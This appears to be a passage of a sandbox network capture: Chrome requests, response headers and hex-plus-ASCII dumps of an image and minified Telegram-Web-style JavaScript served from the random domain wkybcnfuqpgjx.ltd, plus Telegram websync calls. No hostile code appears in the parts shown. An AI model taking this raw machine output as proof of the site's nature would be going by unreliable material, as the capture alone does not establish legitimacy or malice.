                                  2025-01-12 00:03:44 UTC1369INData Raw: 50 69 6e 3a 22 50 69 6e 22 2c 46 6f 72 77 61 72 64 3a 22 46 6f 72 77 61 72 64 22 2c 22 43 6f 6d 6d 6f 6e 2e 53 65 6c 65 63 74 22 3a 22 53 65 6c 65 63 74 22 2c 44 65 6c 65 74 65 53 69 6e 67 6c 65 4d 65 73 73 61 67 65 73 54 69 74 6c 65 3a 22 44 65 6c 65 74 65 20 6d 65 73 73 61 67 65 22 2c 41 72 65 59 6f 75 53 75 72 65 44 65 6c 65 74 65 53 69 6e 67 6c 65 4d 65 73 73 61 67 65 3a 22 41 72 65 20 79 6f 75 20 73 75 72 65 20 79 6f 75 20 77 61 6e 74 20 74 6f 20 64 65 6c 65 74 65 20 74 68 69 73 20 6d 65 73 73 61 67 65 3f 22 2c 50 69 6e 4d 65 73 73 61 67 65 41 6c 65 72 74 54 69 74 6c 65 3a 22 50 69 6e 20 6d 65 73 73 61 67 65 22 2c 50 69 6e 4d 65 73 73 61 67 65 41 6c 65 72 74 43 68 61 74 3a 22 44 6f 20 79 6f 75 20 77 61 6e 74 20 74 6f 20 70 69 6e 20 74 68 69 73 20 6d
                                  Data Ascii: Pin:"Pin",Forward:"Forward","Common.Select":"Select",DeleteSingleMessagesTitle:"Delete message",AreYouSureDeleteSingleMessage:"Are you sure you want to delete this message?",PinMessageAlertTitle:"Pin message",PinMessageAlertChat:"Do you want to pin this m
                                  2025-01-12 00:03:44 UTC1369INData Raw: 73 69 63 20 66 69 6c 65 73 20 66 6f 75 6e 64 22 2c 45 6e 74 65 72 43 68 61 6e 6e 65 6c 4e 61 6d 65 3a 22 43 68 61 6e 6e 65 6c 20 6e 61 6d 65 22 2c 44 65 73 63 72 69 70 74 69 6f 6e 50 6c 61 63 65 68 6f 6c 64 65 72 3a 22 44 65 73 63 72 69 70 74 69 6f 6e 22 2c 43 68 61 6e 6e 65 6c 54 79 70 65 3a 22 43 68 61 6e 6e 65 6c 20 54 79 70 65 22 2c 54 79 70 65 50 75 62 6c 69 63 3a 22 50 75 62 6c 69 63 22 2c 44 69 73 63 75 73 73 69 6f 6e 3a 22 44 69 73 63 75 73 73 69 6f 6e 22 2c 44 69 73 63 75 73 73 69 6f 6e 55 6e 6c 69 6e 6b 3a 22 55 6e 6c 69 6e 6b 22 2c 43 68 61 6e 6e 65 6c 41 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 3a 22 41 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 2c 43 68 61 6e 6e 65 6c 53 69 67 6e 4d 65 73 73 61 67 65 73 3a 22 53 69 67 6e 20 4d 65 73 73 61 67 65
                                  Data Ascii: sic files found",EnterChannelName:"Channel name",DescriptionPlaceholder:"Description",ChannelType:"Channel Type",TypePublic:"Public",Discussion:"Discussion",DiscussionUnlink:"Unlink",ChannelAdministrators:"Administrators",ChannelSignMessages:"Sign Message


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  16192.168.2.649771172.67.137.414432644C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2025-01-12 00:03:44 UTC643OUTGET /chat-bg-br.f34cc96fbfb048812820.png HTTP/1.1
                                  Host: wkybcnfuqpgjx.ltd
                                  Connection: keep-alive
                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                  sec-ch-ua-mobile: ?0
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  sec-ch-ua-platform: "Windows"
                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                  Sec-Fetch-Site: same-origin
                                  Sec-Fetch-Mode: no-cors
                                  Sec-Fetch-Dest: image
                                  Referer: https://wkybcnfuqpgjx.ltd/main.949acaf34f3882f511ff.css
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2025-01-12 00:03:44 UTC904INHTTP/1.1 200 OK
                                  Date: Sun, 12 Jan 2025 00:03:44 GMT
                                  Content-Type: image/png
                                  Content-Length: 1920
                                  Connection: close
                                  Last-Modified: Thu, 28 Nov 2024 10:06:39 GMT
                                  ETag: "674840af-780"
                                  Cache-Control: max-age=14400
                                  CF-Cache-Status: HIT
                                  Age: 6952
                                  Accept-Ranges: bytes
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BLpiaWv%2FkAfQdwAHkUDEYbYBT%2BAof8PyBpjjIDAn%2Fsx9ZlqqTWZdqgS0qfrT2AHrQQgZuLFuj2K0V5W2%2B2DX1B3CGR8lLM8rfoUaVwHlar5p9JEpO%2FgxoF7sQk3guChFRfTf6A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 9008e2989b7c43ab-EWR
                                  alt-svc: h3=":443"; ma=86400
                                  server-timing: cfL4;desc="?proto=TCP&rtt=2015&min_rtt=2009&rtt_var=766&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2844&recv_bytes=1221&delivery_rate=1416100&cwnd=224&unsent_bytes=0&cid=29f5a17f163e250c&ts=143&x=0"
                                  2025-01-12 00:03:44 UTC465INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 32 00 00 00 32 08 02 00 00 00 91 5d 1f e6 00 00 07 47 49 44 41 54 78 01 8d d6 09 4f 1b c7 1b c7 f1 79 c5 ff b3 f7 7d 9a 31 2c b0 98 0d 72 23 b7 da 48 39 36 91 43 1d 6a c0 98 c5 d9 a4 16 b5 12 73 e7 4e 5e 4c 7f 33 3f fb e1 d9 0b 2a 7d 35 1a 13 49 f3 e9 33 83 a9 79 fd 61 1f bd a9 09 ff f4 ea fd 90 bd 78 b7 f7 e2 cd e0 d4 37 7d bd 3b 79 d1 1f bf e8 65 a7 bd f4 b4 37 98 76 fb 93 a4 37 49 92 f1 ed db 59 1c 67 71 27 8b db 69 27 4a db e1 a0 1d 0c da 76 70 a3 d1 8f 7e ea 47 df 6d ad 7d d7 0b bf e9 85 5f f5 c2 2f 36 57 3f db 5c f9 ec e1 ca 27 dd 00 7d 84 1e b8 fe ff 60 c9 bc 7e 3f ac 63 39 b1 32 a1 f3 b7 ce 74 fc 66 67 fa a2 ef 58 67 bf 67 34 4d bb 30 75 61 1a df aa 30 f5 23 9a 7e d8 6a 89 09 69 93 80 fe 77
                                  Data Ascii: PNGIHDR22]GIDATxOy}1,r#H96CjsN^L3?*}5I3yax7};ye7v7IYgq'i'Jvp~Gm}_/6W?\'}`~?c92tfgXgg4M0ua0#~jiw
                                  2025-01-12 00:03:44 UTC1369INData Raw: 44 13 40 da c4 aa 4c 64 61 12 94 91 c2 64 48 ca 84 1e c1 34 ff fe 4c ea 47 55 6d 82 86 11 a4 4c ac 99 63 1d bf e9 e3 78 24 14 e6 40 6f fa 30 f1 ee 0e 5f 3c 1a 9f 73 54 dd c2 a8 c0 92 2f 2a 3d aa cf 37 03 b0 f4 c5 31 80 98 36 15 59 38 9b 32 86 3d 22 a8 d2 54 fe f3 d7 ce 3a 72 83 ea 55 f1 49 d5 b2 18 4d e5 0c ce 06 42 d2 20 5e 1c de 93 32 a1 a4 30 aa f6 41 3b 77 83 5b 6b c2 12 19 34 d5 b2 c4 6a 8d 7c 34 38 18 02 38 94 e6 11 3b bc 34 6d c2 84 60 f2 a3 82 89 7f 95 39 2a b2 22 b2 64 5a fe 12 c1 42 4b 7e 66 a8 c9 88 23 0b 1f a9 c1 c6 d5 b5 c8 1c 12 c1 2a 40 73 d3 b1 37 4d 9d 29 37 aa ac ad 59 7a 5a 64 21 b0 18 ce 13 99 46 60 f3 69 d7 22 ec b9 31 f8 1e 82 40 47 90 ff 7e ea a2 4a 93 1f 15 58 bf e0 06 1d 6b 2f f2 ac 90 2c ff e4 03 34 97 2d 12 27 e1 27 dc 40 80 3d
                                  Data Ascii: D@LdadH4LGUmLcx$@o0_<sT/*=716Y82="T:rUIMB ^20A;w[k4j|488;4m`9*"dZBK~f#*@s7M)7YzZd!F`i"1@G~JXk/,4-''@=
                                  2025-01-12 00:03:44 UTC86INData Raw: 06 56 21 43 7a 6c e8 ba 99 19 ce 86 20 57 bf e1 b3 f3 bd c5 aa 59 4b 7d 99 16 64 79 56 46 96 c8 78 9b 82 a3 0c 5d 2b 23 6b 9b 2c 31 31 cb 95 d5 c9 c0 42 71 49 b6 45 19 52 32 3d b3 ba db 44 90 fd 0d 46 e2 25 ab 51 73 31 15 00 00 00 00 49 45 4e 44 ae 42 60 82
                                  Data Ascii: V!Czl WYK}dyVFx]+#k,11BqIER2=DF%Qs1IENDB`


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  17192.168.2.649772172.67.137.414432644C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2025-01-12 00:03:44 UTC369OUTGET /main.d54bfa037348b154a941.js HTTP/1.1
                                  Host: wkybcnfuqpgjx.ltd
                                  Connection: keep-alive
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  Accept: */*
                                  Sec-Fetch-Site: none
                                  Sec-Fetch-Mode: cors
                                  Sec-Fetch-Dest: empty
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2025-01-12 00:03:44 UTC927INHTTP/1.1 200 OK
                                  Date: Sun, 12 Jan 2025 00:03:44 GMT
                                  Content-Type: application/javascript
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Last-Modified: Thu, 28 Nov 2024 10:06:39 GMT
                                  Vary: Accept-Encoding
                                  ETag: W/"674840af-48637"
                                  Cache-Control: max-age=14400
                                  CF-Cache-Status: HIT
                                  Age: 2798
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fPbvjSEooORHVgGtKjtmtxZ%2BO39yLvPqhIib2pkD8gekZH8%2BiVKtIpwSYnepjGO%2FvMiOdQc22RTppWPO9VBzh0SPdbCNikdB36mzwMv%2FRChVlBnfWgaQg2xm%2FMAyZr8S6AMIdQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 9008e298cf3d43a9-EWR
                                  alt-svc: h3=":443"; ma=86400
                                  server-timing: cfL4;desc="?proto=TCP&rtt=1640&min_rtt=1629&rtt_var=634&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2843&recv_bytes=947&delivery_rate=1694718&cwnd=245&unsent_bytes=0&cid=02f2a3c63f6217a0&ts=133&x=0"
                                  2025-01-12 00:03:44 UTC442INData Raw: 37 63 64 37 0d 0a 28 28 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 65 2c 74 2c 6e 2c 6f 2c 72 3d 7b 34 38 37 35 3a 28 65 2c 74 2c 6e 29 3d 3e 7b 6e 2e 64 28 74 2c 7b 70 78 3a 28 29 3d 3e 4d 2c 65 5a 3a 28 29 3d 3e 4e 2c 41 72 3a 28 29 3d 3e 46 2c 50 48 3a 28 29 3d 3e 4f 2c 48 6e 3a 28 29 3d 3e 78 2c 52 75 3a 28 29 3d 3e 6b 2c 65 75 3a 28 29 3d 3e 4c 2c 69 42 3a 28 29 3d 3e 50 2c 66 6a 3a 28 29 3d 3e 54 7d 29 3b 76 61 72 20 6f 3d 6e 28 31 34 38 31 29 2c 72 3d 6e 28 31 31 38 32 29 2c 61 3d 6e 28 39 37 30 35 29 2c 73 3d 6e 28 34 34 38 37 29 2c 64 3d 6e 28 34 32 33 35 29 2c 69 3d 6e 28 37 38 33 36 29 2c 63 3d 6e 28 32 33 39 33 29 3b 63 6f 6e 73 74 20 75 3d 31 35 30 2c 6c 3d 35 65 33 2c 66 3d 6e 65 77 20 53 65 74 28 5b 22 64 65 73 74 72 6f
                                  Data Ascii: 7cd7(()=>{"use strict";var e,t,n,o,r={4875:(e,t,n)=>{n.d(t,{px:()=>M,eZ:()=>N,Ar:()=>F,PH:()=>O,Hn:()=>x,Ru:()=>k,eu:()=>L,iB:()=>P,fj:()=>T});var o=n(1481),r=n(1182),a=n(9705),s=n(4487),d=n(4235),i=n(7836),c=n(2393);const u=150,l=5e3,f=new Set(["destro
                                  2025-01-12 00:03:44 UTC1369INData Raw: 62 3d 65 7d 29 29 3b 63 6f 6e 73 74 20 76 3d 63 2e 62 73 3f 6e 65 77 20 42 72 6f 61 64 63 61 73 74 43 68 61 6e 6e 65 6c 28 6f 2e 72 4c 46 29 3a 76 6f 69 64 20 30 2c 77 3d 28 30 2c 69 2e 46 65 29 28 28 28 29 3d 3e 7b 63 6f 6e 73 74 20 65 3d 67 3b 67 3d 5b 5d 2c 68 3f 2e 70 6f 73 74 4d 65 73 73 61 67 65 28 7b 70 61 79 6c 6f 61 64 73 3a 65 7d 29 7d 29 29 3b 66 75 6e 63 74 69 6f 6e 20 43 28 65 29 7b 67 2e 70 75 73 68 28 65 29 2c 77 28 29 7d 6c 65 74 20 41 2c 53 3d 5b 5d 2c 45 3d 5b 5d 2c 49 3d 21 31 3b 66 75 6e 63 74 69 6f 6e 20 6b 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 41 3d 65 2c 62 3f 28 68 7c 7c 28 6f 2e 4f 69 67 26 26 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 28 22 3e 3e 3e 20 53 54 41 52 54 20 4c 4f 41 44 20 57 4f 52 4b 45 52 22 29 2c 68 3d 6e 65 77 20 57 6f 72
                                  Data Ascii: b=e}));const v=c.bs?new BroadcastChannel(o.rLF):void 0,w=(0,i.Fe)((()=>{const e=g;g=[],h?.postMessage({payloads:e})}));function C(e){g.push(e),w()}let A,S=[],E=[],I=!1;function k(e,t){return A=e,b?(h||(o.Oig&&console.log(">>> START LOAD WORKER"),h=new Wor
                                  2025-01-12 00:03:44 UTC1369INData Raw: 6c 41 72 67 73 3a 65 7d 29 7d 28 74 29 2c 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 29 29 7d 66 75 6e 63 74 69 6f 6e 20 54 28 65 2c 74 2c 6e 29 7b 79 5b 65 5d 5b 74 5d 3d 6e 7d 66 75 6e 63 74 69 6f 6e 20 50 28 65 29 7b 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 28 79 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 4c 28 65 29 7b 72 65 74 75 72 6e 20 42 28 7b 74 79 70 65 3a 22 74 6f 67 67 6c 65 44 65 62 75 67 4d 6f 64 65 22 2c 69 73 45 6e 61 62 6c 65 64 3a 65 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 4e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 2c 6e 3d 6e 65 77 20 41 72 72 61 79 28 74 3e 31 3f 74 2d 31 3a 30 29 2c 72 3d 31 3b 72 3c 74 3b 72 2b 2b 29 6e 5b 72 2d 31 5d 3d 61 72 67 75 6d 65 6e 74 73 5b 72 5d 3b 69 66 28 21
                                  Data Ascii: lArgs:e})}(t),Promise.resolve())}function T(e,t,n){y[e][t]=n}function P(e){Object.assign(y,e)}function L(e){return B({type:"toggleDebugMode",isEnabled:e})}function N(e){for(var t=arguments.length,n=new Array(t>1?t-1:0),r=1;r<t;r++)n[r-1]=arguments[r];if(!
                                  2025-01-12 00:03:44 UTC1369INData Raw: 65 73 70 6f 6e 73 65 29 29 7d 66 75 6e 63 74 69 6f 6e 20 4f 28 65 29 7b 6d 2e 67 65 74 28 65 2e 6d 65 73 73 61 67 65 49 64 29 3f 2e 63 61 6c 6c 62 61 63 6b 3f 2e 28 2e 2e 2e 65 2e 63 61 6c 6c 62 61 63 6b 41 72 67 73 29 7d 66 75 6e 63 74 69 6f 6e 20 42 28 65 29 7b 63 6f 6e 73 74 20 74 3d 28 30 2c 64 2e 41 29 28 29 2c 6e 3d 7b 6d 65 73 73 61 67 65 49 64 3a 74 2c 2e 2e 2e 65 7d 2c 6f 3d 7b 6d 65 73 73 61 67 65 49 64 3a 74 7d 2c 72 3d 6e 65 77 20 50 72 6f 6d 69 73 65 28 28 28 65 2c 74 29 3d 3e 7b 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 28 6f 2c 7b 72 65 73 6f 6c 76 65 3a 65 2c 72 65 6a 65 63 74 3a 74 7d 29 7d 29 29 3b 69 66 28 22 61 72 67 73 22 69 6e 20 6e 26 26 22 6e 61 6d 65 22 69 6e 20 6e 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 6e 2e
                                  Data Ascii: esponse))}function O(e){m.get(e.messageId)?.callback?.(...e.callbackArgs)}function B(e){const t=(0,d.A)(),n={messageId:t,...e},o={messageId:t},r=new Promise(((e,t)=>{Object.assign(o,{resolve:e,reject:t})}));if("args"in n&&"name"in n&&"function"==typeof n.
                                  2025-01-12 00:03:44 UTC1369INData Raw: 2e 4d 65 6e 74 69 6f 6e 3d 22 4d 65 73 73 61 67 65 45 6e 74 69 74 79 4d 65 6e 74 69 6f 6e 22 2c 65 2e 50 68 6f 6e 65 3d 22 4d 65 73 73 61 67 65 45 6e 74 69 74 79 50 68 6f 6e 65 22 2c 65 2e 50 72 65 3d 22 4d 65 73 73 61 67 65 45 6e 74 69 74 79 50 72 65 22 2c 65 2e 53 74 72 69 6b 65 3d 22 4d 65 73 73 61 67 65 45 6e 74 69 74 79 53 74 72 69 6b 65 22 2c 65 2e 54 65 78 74 55 72 6c 3d 22 4d 65 73 73 61 67 65 45 6e 74 69 74 79 54 65 78 74 55 72 6c 22 2c 65 2e 55 72 6c 3d 22 4d 65 73 73 61 67 65 45 6e 74 69 74 79 55 72 6c 22 2c 65 2e 55 6e 64 65 72 6c 69 6e 65 3d 22 4d 65 73 73 61 67 65 45 6e 74 69 74 79 55 6e 64 65 72 6c 69 6e 65 22 2c 65 2e 53 70 6f 69 6c 65 72 3d 22 4d 65 73 73 61 67 65 45 6e 74 69 74 79 53 70 6f 69 6c 65 72 22 2c 65 2e 43 75 73 74 6f 6d 45 6d
                                  Data Ascii: .Mention="MessageEntityMention",e.Phone="MessageEntityPhone",e.Pre="MessageEntityPre",e.Strike="MessageEntityStrike",e.TextUrl="MessageEntityTextUrl",e.Url="MessageEntityUrl",e.Underline="MessageEntityUnderline",e.Spoiler="MessageEntitySpoiler",e.CustomEm
                                  2025-01-12 00:03:44 UTC1369INData Raw: 7c 7c 24 2c 5b 73 65 2c 64 65 2c 69 65 5d 3d 28 30 2c 67 2e 41 29 28 21 28 30 2c 6f 2e 4f 56 29 28 29 7c 7c 61 65 29 3b 28 30 2c 79 2e 41 79 29 28 69 65 2c 64 65 2c 61 65 29 2c 28 30 2c 6f 2e 76 4a 29 28 28 28 29 3d 3e 7b 61 65 26 26 64 65 28 29 7d 29 2c 5b 61 65 5d 29 2c 28 30 2c 45 2e 41 29 28 28 28 29 3d 3e 7b 69 66 28 55 26 26 21 5a 29 7b 63 6f 6e 73 74 7b 72 3a 65 2c 67 3a 74 2c 62 3a 6e 7d 3d 28 30 2c 66 2e 45 32 29 28 55 29 3b 72 65 2e 63 75 72 72 65 6e 74 3d 5b 65 2c 74 2c 6e 5d 7d 65 6c 73 65 20 72 65 2e 63 75 72 72 65 6e 74 3d 76 6f 69 64 20 30 7d 29 2c 5b 55 2c 5a 5d 29 3b 63 6f 6e 73 74 20 63 65 3d 28 30 2c 6f 2e 6c 69 29 28 21 31 29 3b 28 30 2c 6f 2e 5f 57 29 28 28 28 29 3d 3e 7b 63 65 2e 63 75 72 72 65 6e 74 3d 21 30 7d 29 29 3b 63 6f 6e 73
                                  Data Ascii: ||$,[se,de,ie]=(0,g.A)(!(0,o.OV)()||ae);(0,y.Ay)(ie,de,ae),(0,o.vJ)((()=>{ae&&de()}),[ae]),(0,E.A)((()=>{if(U&&!Z){const{r:e,g:t,b:n}=(0,f.E2)(U);re.current=[e,t,n]}else re.current=void 0}),[U,Z]);const ce=(0,o.li)(!1);(0,o._W)((()=>{ce.current=!0}));cons
                                  2025-01-12 00:03:44 UTC1369INData Raw: 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 32 5d 26 26 61 72 67 75 6d 65 6e 74 73 5b 32 5d 3b 63 6f 6e 73 74 20 72 3d 28 30 2c 62 2e 41 29 28 65 29 2c 61 3d 28 30 2c 62 2e 41 29 28 74 29 3b 28 30 2c 6f 2e 76 4a 29 28 28 28 29 3d 3e 7b 69 66 28 21 6e 29 72 65 74 75 72 6e 20 77 2e 61 64 64 43 61 6c 6c 62 61 63 6b 28 72 29 2c 43 2e 61 64 64 43 61 6c 6c 62 61 63 6b 28 61 29 2c 28 29 3d 3e 7b 43 2e 72 65 6d 6f 76 65 43 61 6c 6c 62 61 63 6b 28 61 29 2c 77 2e 72 65 6d 6f 76 65 43 61 6c 6c 62 61 63 6b 28 72 29 7d 7d 29 2c 5b 6e 2c 72 2c 61 5d 29 7d 28 6d 65 2c 66 65 2c 21 74 65 7c 7c 5f 29 2c 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 6c 65 74 20 6e 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 32 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75
                                  Data Ascii: void 0!==arguments[2]&&arguments[2];const r=(0,b.A)(e),a=(0,b.A)(t);(0,o.vJ)((()=>{if(!n)return w.addCallback(r),C.addCallback(a),()=>{C.removeCallback(a),w.removeCallback(r)}}),[n,r,a])}(me,fe,!te||_),function(e,t){let n=arguments.length>2&&void 0!==argu
                                  2025-01-12 00:03:44 UTC1369INData Raw: 6f 6e 73 74 20 6e 3d 5b 5d 2c 6f 3d 5b 5d 2c 72 3d 65 2e 6c 65 6e 67 74 68 3b 6c 65 74 20 61 2c 73 2c 63 2c 66 2c 70 2c 67 2c 79 2c 62 2c 76 2c 77 2c 43 2c 41 2c 53 3b 66 6f 72 28 61 3d 31 32 38 2c 63 3d 30 2c 66 3d 37 32 2c 70 3d 65 2e 6c 61 73 74 49 6e 64 65 78 4f 66 28 22 2d 22 29 2c 70 3c 30 26 26 28 70 3d 30 29 2c 67 3d 30 3b 67 3c 70 3b 2b 2b 67 29 7b 69 66 28 74 26 26 28 6f 5b 6e 2e 6c 65 6e 67 74 68 5d 3d 65 2e 63 68 61 72 43 6f 64 65 41 74 28 67 29 2d 36 35 3c 32 36 29 2c 65 2e 63 68 61 72 43 6f 64 65 41 74 28 67 29 3e 3d 31 32 38 29 74 68 72 6f 77 20 6e 65 77 20 52 61 6e 67 65 45 72 72 6f 72 28 22 49 6c 6c 65 67 61 6c 20 69 6e 70 75 74 20 3e 3d 20 30 78 38 30 22 29 3b 6e 2e 70 75 73 68 28 65 2e 63 68 61 72 43 6f 64 65 41 74 28 67 29 29 7d 66 6f
                                  Data Ascii: onst n=[],o=[],r=e.length;let a,s,c,f,p,g,y,b,v,w,C,A,S;for(a=128,c=0,f=72,p=e.lastIndexOf("-"),p<0&&(p=0),g=0;g<p;++g){if(t&&(o[n.length]=e.charCodeAt(g)-65<26),e.charCodeAt(g)>=128)throw new RangeError("Illegal input >= 0x80");n.push(e.charCodeAt(g))}fo
                                  2025-01-12 00:03:44 UTC1369INData Raw: 2c 65 2c 74 29 7d 7d 63 6f 6e 73 74 20 77 3d 65 3d 3e 7b 6c 65 74 7b 75 72 6c 3a 74 2c 74 65 78 74 3a 6e 2c 63 6c 61 73 73 4e 61 6d 65 3a 73 2c 63 68 69 6c 64 72 65 6e 3a 64 2c 77 69 74 68 4e 6f 72 6d 61 6c 57 6f 72 64 42 72 65 61 6b 3a 69 2c 69 73 52 74 6c 3a 63 7d 3d 65 3b 63 6f 6e 73 74 7b 6f 70 65 6e 55 72 6c 3a 75 7d 3d 28 30 2c 72 2e 6b 6f 29 28 29 2c 6c 3d 64 7c 7c 6e 2c 66 3d 74 3d 3d 3d 6e 2c 68 3d 28 30 2c 62 2e 41 29 28 28 65 3d 3e 21 74 7c 7c 28 65 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 2c 75 28 7b 75 72 6c 3a 74 2c 73 68 6f 75 6c 64 53 6b 69 70 4d 6f 64 61 6c 3a 66 7d 29 2c 21 31 29 29 29 3b 69 66 28 21 74 29 72 65 74 75 72 6e 3b 63 6f 6e 73 74 20 6d 3d 28 30 2c 67 2e 41 29 28 73 7c 7c 22 74 65 78 74 2d 65 6e 74 69 74 79 2d 6c 69
                                  Data Ascii: ,e,t)}}const w=e=>{let{url:t,text:n,className:s,children:d,withNormalWordBreak:i,isRtl:c}=e;const{openUrl:u}=(0,r.ko)(),l=d||n,f=t===n,h=(0,b.A)((e=>!t||(e.preventDefault(),u({url:t,shouldSkipModal:f}),!1)));if(!t)return;const m=(0,g.A)(s||"text-entity-li
                                  2025-01-12 00:03:44 UTC1369INData Raw: 63 74 6f 72 53 65 74 75 70 4d 6f 6e 6b 65 79 54 72 61 63 6b 69 6e 67 2e 65 62 35 61 37 61 36 66 31 36 36 66 62 37 35 38 39 63 31 32 2e 74 67 73 22 2c 53 3d 6e 2e 70 2b 22 52 65 61 64 54 69 6d 65 2e 30 31 35 64 36 65 36 66 37 33 66 37 36 38 66 31 65 39 66 65 2e 74 67 73 22 2c 45 3d 6e 2e 70 2b 22 52 65 70 6f 72 74 2e 34 61 35 64 64 61 30 32 32 37 65 61 38 36 66 36 66 61 35 65 2e 74 67 73 22 2c 49 3d 6e 2e 70 2b 22 43 6f 6e 67 72 61 74 75 6c 61 74 69 6f 6e 73 2e 62 36 36 32 33 62 38 65 66 63 36 66 65 64 65 63 39 64 33 33 2e 74 67 73 22 2c 6b 3d 6e 2e 70 2b 22 44 69 73 63 75 73 73 69 6f 6e 47 72 6f 75 70 73 44 75 63 6b 73 2e 39 65 61 34 35 33 64 31 62 65 39 64 31 62 30 65 65 37 37 61 2e 74 67 73 22 2c 54 3d 6e 2e 70 2b 22 45 78 70 65 72 69 6d 65 6e 74 61 6c
                                  Data Ascii: ctorSetupMonkeyTracking.eb5a7a6f166fb7589c12.tgs",S=n.p+"ReadTime.015d6e6f73f768f1e9fe.tgs",E=n.p+"Report.4a5dda0227ea86f6fa5e.tgs",I=n.p+"Congratulations.b6623b8efc6fedec9d33.tgs",k=n.p+"DiscussionGroupsDucks.9ea453d1be9d1b0ee77a.tgs",T=n.p+"Experimental


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  18192.168.2.649779149.154.167.994432644C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2025-01-12 00:03:44 UTC364OUTGET /_websync_?authed=0&version=10.9.21+A HTTP/1.1
                                  Host: t.me
                                  Connection: keep-alive
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  Accept: */*
                                  Sec-Fetch-Site: none
                                  Sec-Fetch-Mode: cors
                                  Sec-Fetch-Dest: empty
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2025-01-12 00:03:44 UTC482INHTTP/1.1 200 OK
                                  Server: nginx/1.18.0
                                  Date: Sun, 12 Jan 2025 00:03:44 GMT
                                  Content-Type: application/json; charset=utf-8
                                  Content-Length: 4
                                  Connection: close
                                  Set-Cookie: stel_web_auth=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; samesite=None; secure; HttpOnly
                                  Set-Cookie: stel_web_force=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; samesite=None; secure; HttpOnly
                                  Pragma: no-cache
                                  Cache-control: no-store
                                  Strict-Transport-Security: max-age=35768000
                                  2025-01-12 00:03:44 UTC4INData Raw: 74 72 75 65
                                  Data Ascii: true


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  19192.168.2.649780149.154.167.994432644C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2025-01-12 00:03:44 UTC371OUTGET /_websync_?authed=0&version=10.9.21+A HTTP/1.1
                                  Host: telegram.me
                                  Connection: keep-alive
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  Accept: */*
                                  Sec-Fetch-Site: none
                                  Sec-Fetch-Mode: cors
                                  Sec-Fetch-Dest: empty
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2025-01-12 00:03:44 UTC482INHTTP/1.1 200 OK
                                  Server: nginx/1.18.0
                                  Date: Sun, 12 Jan 2025 00:03:44 GMT
                                  Content-Type: application/json; charset=utf-8
                                  Content-Length: 4
                                  Connection: close
                                  Set-Cookie: stel_web_auth=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; samesite=None; secure; HttpOnly
                                  Set-Cookie: stel_web_force=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; samesite=None; secure; HttpOnly
                                  Pragma: no-cache
                                  Cache-control: no-store
                                  Strict-Transport-Security: max-age=35768000
                                  2025-01-12 00:03:44 UTC4INData Raw: 74 72 75 65
                                  Data Ascii: true


                                  Session IDSource IPSource PortDestination IPDestination Port
